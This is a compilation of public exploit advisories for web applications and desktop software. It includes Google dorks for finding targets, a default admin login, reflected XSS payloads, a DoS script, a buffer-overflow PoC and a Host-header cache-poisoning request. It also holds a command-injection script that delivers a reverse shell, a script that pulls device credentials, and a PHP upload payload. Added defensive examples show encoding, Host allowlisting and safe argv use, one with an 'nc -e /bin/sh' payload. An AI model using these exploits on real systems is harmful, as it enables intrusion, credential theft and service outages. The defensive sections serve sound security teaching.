<pre><code>======================================================================================================================================<br />| # Title : Varient News Magazine Script V1.3.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) |<br />| # Vendor : https://varient.codingest.com/ |<br />| # Dork : "Varient - News Magazine - Varient" |<br />======================================================================================================================================<br /><br />PoC :<br /><br />[+] Find targets by dorking in Google or another search engine.<br /><br />[+] Insecure Settings : the application appears to leave a default administrative account in place after installation.<br /><br />[+] Log in with Admin : admin@gmail.com &amp; Pass : 1234<br /><br />[+] http://127.0.0.1/wwwmafrxyz/admin<br /><br />[+] Check : an installation whose operator has changed or removed this account is not affected; the login above is the whole test.<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : IWT Imagine CMS v1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 66.0.2 (32-bit) |<br />| # Vendor : http://imaginewebtech.com |<br />====================================================================================================================================<br /><br />PoC :<br /><br />[+] Find targets by dorking in Google or another search engine.<br /><br />[+] The id parameter of photo-gallery.html is reflected into the page without output encoding, so injected markup is rendered by the browser (reflected XSS).<br /><br />[+] Use payload : /photo-gallery.html?id=1'&lt;marquee&gt;&lt;font color=lime size=32&gt;Hacked by indoushka&lt;/font&gt;&lt;/marquee&gt;<br /><br />[+] https://127.0.0.1/wwsanklechain/photo-gallery.html?id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : iSmile Soft CMS v0.3.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 63.0.3 (32-bit) |<br />| # Vendor : https://jamalcom.com |<br />| # Dork : JamalCom هذا السكربت مبرمج بواسطة ("this script was developed by JamalCom") |<br />====================================================================================================================================<br />PoC :<br /><br />[+] Find targets by dorking in Google or another search engine.<br /><br />[+] The path segment after /themes/index.php/ is reflected into the page without output encoding (reflected XSS via PATH_INFO rather than a query parameter).<br /><br />[+] Use payload : /themes/index.php/1%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />[+] http://127.0.0.1/iSmile/themes/index.php/1%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E<br /><br />Add Admin : the installer remains reachable after setup, and its step 3 (etape=3) can be used to create an administrator account :<br /><br />http://127.0.0.1/iSmile/install.php?etape=3<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>## Title: Event Ticketing System-1.0 XSS-Reflected - RCE<br />## Author: nu11secur1ty<br />## Date: 09/08/2023<br />## Vendor: https://www.phpjabbers.com/<br />## Software: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo<br />## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected<br /><br />## Description:<br />The value of the `id` request parameter is copied, without encoding, into the value of an<br />HTML tag attribute that is enclosed in double quotation marks.<br />The payload }}uypja"&gt;&lt;script&gt;alert(1)&lt;/script&gt;k36c0 was submitted in<br />the id parameter and was echoed verbatim as<br />uypja"&gt;&lt;script&gt;alert(1)&lt;/script&gt;k36c0 in the application's response: the `"` closes<br />the attribute and the injected `&lt;script&gt;` element is rendered.<br />An attacker exploits this by tricking a user into opening a crafted URL in their<br />browser; the injected script then runs in that user's session on the application's origin.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Testing Payload:<br />```GET<br />GET /1694154671_204/index.php?controller=pjFront&amp;action=pjActionCheckout&amp;locale=1&amp;id=1hau48%22%3e%3cscript%3ealert(1)%3c%2fscript%3exoplm HTTP/1.1<br />Host: demo.phpjabbers.com<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: EventTicketing=lirq5h64gv5dj0utbp2r5nsqf7<br />Origin: http://demo.phpjabbers.com<br />Referer: http://demo.phpjabbers.com/<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Event-Ticketing-System-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/09/event-ticketing-system-10-xss-reflected.html)<br /><br />## Time spent:<br />01:25:00<br /></code></pre>
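<p>The three advisories above (IWT Imagine, iSmile and the Event Ticketing System) share one root cause: a request value is written into HTML without output encoding. The block below is an added example, not code from any of those advisories or products. It shows that reflection pattern beside a fixed version, and the check a tester uses to tell a harmless, encoded reflection from an exploitable one. The page template and the parameter name <code>id</code> are illustrative; <code>PROBE</code> is a constructed marker.</p>

```python
"""
Added example; not code from the IWT Imagine, iSmile or Event Ticketing advisories
or products. Shows the reflection pattern behind all three (a request value written
into HTML without output encoding) beside a fixed version, and the check that
separates a harmless, encoded reflection from an exploitable one. The template and
the parameter name 'id' are illustrative; PROBE is a constructed marker.
"""
import html
import re
from typing import Dict
from urllib.parse import urlencode

# Constructed probe: the double quote closes an attribute, the tags test body context.
PROBE = '1zq9k"><u>zq9k</u>'


def render_gallery_vulnerable(params: Dict[str, str]) -> str:
    """Echoes the raw parameter into a quoted attribute (the Event Ticketing case)
    and into element text (the two indoushka PoCs)."""
    gallery_id = params.get("id", "")
    return (f'<input type="hidden" name="id" value="{gallery_id}">\n'
            f'<h2>Gallery {gallery_id}</h2>')


def render_gallery_fixed(params: Dict[str, str], validate: bool = True) -> str:
    """Hardened: validate the identifier, then HTML-encode for the output context.
    Encoding alone (validate=False) already neutralises the injection; validation
    on top rejects the bad request outright."""
    raw = params.get("id", "")
    if validate and not re.fullmatch(r"[0-9]{1,10}", raw):
        raw = ""  # a real handler would return 400 Bad Request here
    safe = html.escape(raw, quote=True)
    return (f'<input type="hidden" name="id" value="{safe}">\n'
            f'<h2>Gallery {safe}</h2>')


def reflection_kind(body: str, probe: str = PROBE) -> str:
    """Classify a response: 'unencoded' means the probe came back byte-for-byte
    and the tester has working XSS; 'encoded' means the value is reflected but
    neutralised; 'absent' means it is not reflected at all (or was rejected)."""
    if probe in body:
        return "unencoded"
    if html.escape(probe, quote=True) in body or html.escape(probe, quote=False) in body:
        return "encoded"
    return "absent"


def probe_url(base: str, param: str = "id", probe: str = PROBE) -> str:
    """URL the tester would request, with the probe properly query-encoded."""
    return base + "?" + urlencode({param: probe})


if __name__ == "__main__":
    print(probe_url("http://127.0.0.1/photo-gallery.html"))
    for name, page in [("vulnerable", render_gallery_vulnerable({"id": PROBE})),
                       ("encoded only", render_gallery_fixed({"id": PROBE}, validate=False)),
                       ("validated", render_gallery_fixed({"id": PROBE}))]:
        print(f"{name:13} -> {reflection_kind(page)}")
```

<p>The classification matters in practice: scanners report any reflection, but only the <code>unencoded</code> case is exploitable. Checking for the entity-encoded form as well avoids mistaking <code>&amp;lt;script&amp;gt;</code> in the response for a finding.</p>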
<pre><code># Exploit Title: SyncBreeze 15.2.24 - 'login' Denial of Service<br /># Date: 30/08/2023<br /># Exploit Author: mohamed youssef<br /># Vendor Homepage: https://www.syncbreeze.com/<br /># Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe<br /># Version: 15.2.24<br /># Tested on: Windows 10 64-bit<br />#<br /># A single POST to /login whose password field is roughly 4.5 KB long crashes the<br /># web service (denial of service). Set TARGET to the host under test.<br />import socket<br /><br />TARGET = "192.168.217.135"<br /><br /># Oversized credential string: 'password=' repeated 500 times.<br />payload = "username=admin&amp;password=" + "password=" * 500<br /><br />request = ""<br />request += "POST /login HTTP/1.1\r\n"<br />request += "Host: " + TARGET + "\r\n"<br />request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"<br />request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"<br />request += "Accept-Language: en-US,en;q=0.5\r\n"<br />request += "Accept-Encoding: gzip, deflate\r\n"<br />request += "Content-Type: application/x-www-form-urlencoded\r\n"<br />request += "Content-Length: " + str(len(payload)) + "\r\n"<br />request += "Origin: http://" + TARGET + "\r\n"<br />request += "Connection: keep-alive\r\n"<br />request += "Referer: http://" + TARGET + "/login\r\n"<br />request += "Upgrade-Insecure-Requests: 1\r\n"<br />request += "\r\n"<br />request += payload<br /><br />print(request)<br />s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />s.connect((TARGET, 80))<br />s.sendall(request.encode())  # sendall() writes the whole request, unlike send()<br />try:<br />    # A crashed service resets the connection or returns nothing at all.<br />    reply = s.recv(1024)<br />    print(reply if reply else b"(no response: service appears to be down)")<br />except ConnectionError as e:<br />    print("connection dropped (service appears to be down):", e)<br />finally:<br />    s.close()<br /></code></pre>
<pre><code># Exploit Title: GOM Player 2.3.90.5360 - Buffer Overflow (PoC)<br /># Discovered by: Ahmet Ümit BAYRAM<br /># Discovered Date: 30.08.2023<br /># Vendor Homepage: https://www.gomlab.com<br /># Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE<br /># Tested Version: 2.3.90.5360 (latest)<br /># Tested on: Windows 11 64bit<br /># Thanks to: M. Akil GÜNDOĞAN<br /><br /># Steps to reproduce:<br /># - Open GOM Player<br /># - Click the gear icon at the top to open Settings<br /># - In the menu that appears, select Audio<br /># - Click Equalizer<br /># - Click the plus sign to open the "Add EQ preset" screen<br /># - Copy the contents of exploit.txt into the preset name box and click OK<br /># - The player crashes<br /><br />#!/usr/bin/env python3<br /><br /># 260 bytes is enough to overrun the preset-name buffer; the PoC only crashes the<br /># application, it does not demonstrate control of execution.<br />exploit = 'A' * 260<br /><br />try:<br />    with open("exploit.txt", "w") as f:<br />        f.write(exploit)<br />    print("POC is created")<br />except OSError as e:<br />    print("POC is not created:", e)<br /></code></pre>
<pre><code>## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction<br />## Author: nu11secur1ty<br />## Date: 08/30/2023<br />## Vendor: https://www.drupal.org/<br />## Software: https://www.drupal.org/download<br />## Reference: https://portswigger.net/kb/issues/00300210_external-service-interaction-http<br /><br />## Description:<br />It is possible to induce the application to perform server-side HTTP<br />requests to arbitrary domains.<br />The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com was<br />submitted in the HTTP Host header, and the application performed an HTTP<br />request to that domain (see the Burp Collaborator and attacker-server logs below).<br />In a second test the response generated for the poisoned request was stored on<br />the server: the absolute URLs it contains (the rss.xml feed link below) are built<br />from the attacker-controlled Host header, so a cached copy is served to other users.<br />Combined with a redirect, an attacker can spread a malicious URL to many users of<br />the site, for example by email.<br />This depends on the Host header being accepted unchecked: Drupal's<br />trusted_host_patterns setting in settings.php restricts which Host values the site<br />answers for, and it should be configured on every production installation.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Exploit:<br />```GET<br />GET /drupal/web/?psp4hw87ev=1 HTTP/1.1<br />Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com<br />Accept-Encoding: gzip, deflate, psp4hw87ev<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7,text/psp4hw87ev<br />Accept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 psp4hw87ev<br />Connection: close<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Origin: https://psp4hw87ev.pwnedhost.com<br />```<br />[+]Response from the Burp Collaborator server:<br />```HTTP<br />HTTP/1.1 200 OK<br />Server: Burp Collaborator https://burpcollaborator.net/<br />X-Collaborator-Version: 4<br />Content-Type: text/html<br />Content-Length: 62<br /><br />&lt;html&gt;&lt;body&gt;zeq5zcbz3x69x9a63ubxidzjlgigmmgifigz&lt;/body&gt;&lt;/html&gt;<br />```<br /><br />[+]Response from the attacker server:<br />```HTTP<br />192.168.100.45 - - [30/Aug/2023 05:52:56] "GET /drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1"<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/DRUPAL/2013/drupal-10.1.2)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html)<br /><br />## Time spent:<br />03:35:00<br /></code></pre>
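<p>The defence against the Host-header behaviour described above is to validate the header against an allowlist before it is used to build absolute URLs (feed links, redirects, cache keys). The block below is an added example, not Drupal's code or the advisory's; its pattern syntax is modelled on Drupal's <code>trusted_host_patterns</code> setting (anchored regular expressions), and the host names in the allowlist are constructed for the example.</p>

```python
"""
Added example (not part of the advisory or of Drupal's code): validate the HTTP
Host header against an allowlist of anchored regular expressions before it is used
to build absolute URLs. Pattern syntax is modelled on Drupal's
$settings['trusted_host_patterns']; the host names below are constructed.
"""
import re
from typing import Iterable, Optional

# Constructed allowlist, one anchored regex per accepted host.
TRUSTED_HOST_PATTERNS = [
    r"^www\.example\.com$",
    r"^example\.com$",
    r"^192\.168\.100\.45$",
]
CANONICAL_HOST = "www.example.com"   # what generated links fall back to


def split_host_header(value: str) -> Optional[str]:
    """Return the host part of a Host header, lower-cased, with any port removed.
    None means the header is syntactically unusable (empty, bad port, broken IPv6)."""
    value = value.strip().lower()
    if not value:
        return None
    if value.startswith("["):               # IPv6 literal such as [::1]:8080
        end = value.find("]")
        return value[:end + 1] if end != -1 else None
    host, _, port = value.partition(":")
    if port and not port.isdigit():
        return None
    return host or None


def host_is_trusted(host_header: str,
                    patterns: Iterable[str] = TRUSTED_HOST_PATTERNS) -> bool:
    """True only if the host matches one of the configured patterns. Anchoring the
    patterns is what stops 'www.example.com.attacker.test' from passing."""
    host = split_host_header(host_header)
    if host is None:
        return False
    return any(re.search(pattern, host) for pattern in patterns)


def canonical_base_url(host_header: str, scheme: str = "https") -> str:
    """Base URL for generated links: the request's host if trusted, otherwise the
    configured canonical host, never the attacker's value."""
    host = split_host_header(host_header) if host_is_trusted(host_header) else CANONICAL_HOST
    return f"{scheme}://{host}"


def build_feed_url(host_header: str, path: str = "/drupal/web/rss.xml") -> str:
    """The kind of absolute link (feed URL) that a poisoned Host header would
    otherwise point at the attacker's domain."""
    return canonical_base_url(host_header) + path


if __name__ == "__main__":
    for h in ["www.example.com", "www.example.com:443",
              "d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com",
              "www.example.com.attacker.test", "www.example.com:abc"]:
        print(f"{h:55} trusted={host_is_trusted(h)!s:5} feed={build_feed_url(h)}")
```

<p>Rejecting the request outright (HTTP 400) is the stricter choice and is what Drupal does when a Host value matches no pattern; falling back to a canonical host, as above, is the alternative when the application must still answer. Either way, no cache entry should ever be keyed or populated from an unvalidated Host value.</p>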
<pre><code># Exploit Title: Wp2Fac v1.0 - OS Command Injection<br /># Date: 2023-08-27<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor: https://github.com/metinyesil/wp2fac<br /># Tested on: Kali Linux &amp; Windows 11<br /># CVE: N/A<br /><br />import requests<br /><br /><br />def send_post_request(host, revshell):<br />    # The 'numara' (phone number) parameter of send.php reaches a shell without<br />    # sanitisation: '&amp;' ends the intended command and our command runs after it.<br />    url = f'http://{host}/send.php'<br />    headers = {<br />        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',<br />        'Accept': '*/*',<br />        'Accept-Language': 'en-US,en;q=0.5',<br />        'Accept-Encoding': 'gzip, deflate',<br />        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',<br />        'X-Requested-With': 'XMLHttpRequest',<br />        'Origin': f'http://{host}',<br />        'Connection': 'close',<br />        'Referer': f'http://{host}/',<br />    }<br /><br />    data = {<br />        'numara': f'1234567890 &amp; {revshell} &amp;;'<br />    }<br /><br />    try:<br />        # A reverse shell keeps the PHP process busy, so the request may never<br />        # complete; the timeout lets the script return once the shell is up.<br />        response = requests.post(url, headers=headers, data=data, timeout=10)<br />        return response.text<br />    except requests.exceptions.ReadTimeout:<br />        return "(no HTTP response within 10s; the command is probably still running)"<br /><br /><br />host = input("Target IP: ")<br /><br />revshell = input("Reverse Shell Command: ")<br /><br />print("Check your listener!")<br /><br />print(send_post_request(host, revshell))<br /></code></pre>
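<p>The payload shape in the exploit above (<code>&lt;number&gt; &amp; &lt;command&gt; &amp;;</code>) works because the parameter is pasted into a shell command line. The block below is an added example, not Wp2Fac's code or the advisory's exploit: it tokenises the resulting command line the way a POSIX shell would, to show how one intended command becomes several, and places a hardened version beside it that never lets the parameter reach a shell. The parameter name <code>numara</code> and the payload shape come from the advisory; the wrapped command name <code>sendsms.sh</code> and the reverse-shell command are assumptions.</p>

```python
"""
Added example, not the Wp2Fac code or the advisory's exploit. Shows how the
advisory's payload shape ("<number> & <command> &;") splits one shell command into
several, and a hardened version (allowlist validation + argv list, no shell).
'numara' and the payload shape come from the advisory; 'sendsms.sh' is assumed.
"""
import re
import shlex
import subprocess
from typing import List

SHELL_PUNCTUATION = set("();<>|&")   # the control-operator characters shlex groups


def build_shell_line_vulnerable(numara: str) -> str:
    """Vulnerable pattern: request value pasted into a shell command string
    (the PHP equivalent would be shell_exec("sendsms.sh " . $_POST['numara']))."""
    return f"sendsms.sh {numara}"


def simulated_shell_commands(command_line: str) -> List[List[str]]:
    """Tokenise like a POSIX shell and split on control operators (&, ;, |, ...),
    returning the separate argv lists the shell would run. Nothing is executed."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    commands: List[List[str]] = []
    current: List[str] = []
    for tok in lexer:
        if set(tok) <= SHELL_PUNCTUATION:   # '&', ';', '|', '&;', '&&', ...
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


PHONE_RE = re.compile(r"\+?[0-9]{6,15}")


def validate_number(numara: str) -> str:
    """Allowlist: digits only, optional leading '+'. Rejected values never get
    anywhere near a command."""
    if not PHONE_RE.fullmatch(numara):
        raise ValueError(f"invalid phone number: {numara!r}")
    return numara


def build_argv_hardened(numara: str) -> List[str]:
    """Hardened pattern: the validated value is one argv element handed to execve(),
    so shell metacharacters have no meaning even if validation is loosened later."""
    return ["sendsms.sh", validate_number(numara)]


def send_code_hardened(numara: str) -> subprocess.CompletedProcess:
    return subprocess.run(build_argv_hardened(numara), shell=False,
                          capture_output=True, text=True)


if __name__ == "__main__":
    # Constructed payload in the advisory's shape; the nc command is illustrative.
    payload = "1234567890 & nc -e /bin/sh 10.0.0.1 4444 &;"
    for argv in simulated_shell_commands(build_shell_line_vulnerable(payload)):
        print("shell would run:", argv)
    try:
        build_argv_hardened(payload)
    except ValueError as e:
        print("hardened version rejects it:", e)
    print("hardened argv for a clean value:", build_argv_hardened("1234567890"))
```

<p>Both halves of the fix matter: validation alone is defeated the day someone widens the regular expression, and the argv list alone still passes a garbage value to the script, so the two are used together.</p>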
<pre><code># Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities<br /># Google Dork: N/A<br /># Date: 25/08/2023<br /># Exploit Author: The Security Team [exploitsecurity.io]<br /># Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570<br /># Software Link: N/A<br /># Version: 1.0.19_T53<br /># Tested on: MACOS/Linux<br /># CVE : CVE-2023-34723<br /># POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725<br /><br />#!/usr/bin/env python3<br /><br />import ipaddress<br />import os<br />import sys<br />from time import sleep<br /><br />import requests<br />from colorama import Fore, Style<br />from urllib3.exceptions import InsecureRequestWarning<br /><br />requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)<br /><br /><br />def banner():<br />    # Clear the terminal (POSIX or Windows), then print the tool header.<br />    os.system('cls' if os.name == 'nt' else 'clear')<br />    print("[+]****************************************************[+]")<br />    print(" | Author : The Security Team |")<br />    print(" | Company : " + Fore.RED + "Exploit Security" + Style.RESET_ALL + "\t\t\t|")<br />    print(" | Description : TechVIEW LA-5570 Directory Traversal |")<br />    print(" | Usage : " + sys.argv[0] + " &lt;target&gt; |")<br />    print("[+]****************************************************[+]")<br /><br /><br />def usage():<br />    print(f"Usage: {sys.argv[0]} &lt;target&gt;")<br /><br /><br />def main(target):<br />    # The controller hands out its configuration file, credentials included, to<br />    # any unauthenticated client; a plain GET is all that is needed.<br />    url = ("http://" + target + "/config/system.conf").strip()<br />    try:<br />        r = requests.get(url, verify=False, timeout=3)<br />        print("[+] Retrieving credentials", flush=True, end='')<br />        for _ in range(3):<br />            sleep(1)<br />            print(" .", flush=True, end='')<br />        if "system_password" in r.text:<br />            # Print the line(s) carrying the credential rather than a fixed index.<br />            for line in r.text.split("\n"):<br />                if "system_password" in line:<br />                    print(f"\n{line}")<br />        else:<br />            print(Fore.RED + "\n[!] Target is not vulnerable !" + Style.RESET_ALL)<br />    except requests.exceptions.Timeout:<br />        print(Fore.RED + "[!] Timeout connecting to target !" + Style.RESET_ALL)<br />    except requests.exceptions.ConnectionError:<br />        print(Fore.RED + "[!] Could not connect to target !" + Style.RESET_ALL)<br />    except KeyboardInterrupt:<br />        return<br /><br /><br />if __name__ == '__main__':<br />    if len(sys.argv) &gt; 1:<br />        banner()<br />        target = sys.argv[1]<br />        try:<br />            ipaddress.ip_address(target)   # raises ValueError for anything that is not an IP address<br />            main(target)<br />        except ValueError as e:<br />            print(Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL)<br />    else:<br />        usage()<br />        print(Fore.RED + "[+] Not enough arguments, please specify target !" + Style.RESET_ALL)<br /></code></pre>
<pre><code>## Title: soosyze 2.0.0 - File Upload<br />## Author: nu11secur1ty<br />## Date: 04.26.2023-08.28.2023<br />## Vendor: https://soosyze.com/<br />## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0<br />## Reference: https://portswigger.net/web-security/file-upload<br /><br />## Description:<br />Broken file upload logic. The upload handler does not restrict what an uploaded<br />file may contain: a malicious user can upload an HTML file with embedded PHP, and<br />when the uploaded file is requested the embedded PHP is executed by the server.<br />The PoC below calls phpinfo(), which discloses the server configuration and almost<br />all filesystem paths. The impact depends on the deployment and can be much worse.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Exploit:<br />```HTML<br />&lt;!DOCTYPE html&gt;<br />&lt;html&gt;<br />&lt;head&gt;<br />&lt;title&gt;Hello broken file upload logic, now I can read your special directory paths, thank you ;)&lt;/title&gt;<br />&lt;/head&gt;<br />&lt;body&gt;<br />&lt;h1&gt;<br />  &lt;?php<br />  phpinfo();<br />  ?&gt;<br />&lt;/h1&gt;<br />&lt;/body&gt;<br />&lt;/html&gt;<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html)<br /><br />## Time spent:<br />01:27:00<br /></code></pre>